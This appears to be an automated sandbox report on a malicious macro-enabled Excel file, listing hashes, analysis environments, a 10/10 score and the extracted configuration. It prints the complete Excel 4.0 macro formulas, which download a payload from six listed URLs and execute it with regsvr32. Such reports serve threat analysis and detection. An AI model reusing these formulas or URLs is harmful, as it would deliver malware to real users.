General
-
Target
ee52449c51d541faabb9dde1e83dcd28cfd5e272b247059ed75e54b58ddef109
-
Size
49KB
-
Sample
241120-dyk88szhpp
-
MD5
0d3955763848d32fd66194164e48a457
-
SHA1
0f4f03c6cf1f0fc8235720ede6464b4b40b357ae
-
SHA256
ee52449c51d541faabb9dde1e83dcd28cfd5e272b247059ed75e54b58ddef109
-
SHA512
c353d623288a0e9944a77fa625e0e79a264dcbb09cbbc72d6bdac817b324c41d84c01924dba53486da0aea091a57514bfad34aa9133069d11c23f4924df7272d
-
SSDEEP
768:2YCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:2Yu2xXncDSmSIBlGeuSEcm2h0B5lqB
Behavioral task
behavioral1
Sample
ee52449c51d541faabb9dde1e83dcd28cfd5e272b247059ed75e54b58ddef109.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ee52449c51d541faabb9dde1e83dcd28cfd5e272b247059ed75e54b58ddef109.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://retailhpsinterview.com/search/yNbsL/
http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/
http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/
http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/
https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/
https://gsmjordan.com/SupplierPanel/XII/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://retailhpsinterview.com/search/yNbsL/","..\ax.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/","..\ax.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/","..\ax.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/","..\ax.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/","..\ax.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gsmjordan.com/SupplierPanel/XII/","..\ax.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx") =RETURN()
Extracted
http://retailhpsinterview.com/search/yNbsL/
http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/
http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/
http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/
https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/
https://gsmjordan.com/SupplierPanel/XII/
Targets
-
-
Target
ee52449c51d541faabb9dde1e83dcd28cfd5e272b247059ed75e54b58ddef109
-
Size
49KB
-
MD5
0d3955763848d32fd66194164e48a457
-
SHA1
0f4f03c6cf1f0fc8235720ede6464b4b40b357ae
-
SHA256
ee52449c51d541faabb9dde1e83dcd28cfd5e272b247059ed75e54b58ddef109
-
SHA512
c353d623288a0e9944a77fa625e0e79a264dcbb09cbbc72d6bdac817b324c41d84c01924dba53486da0aea091a57514bfad34aa9133069d11c23f4924df7272d
-
SSDEEP
768:2YCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:2Yu2xXncDSmSIBlGeuSEcm2h0B5lqB
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-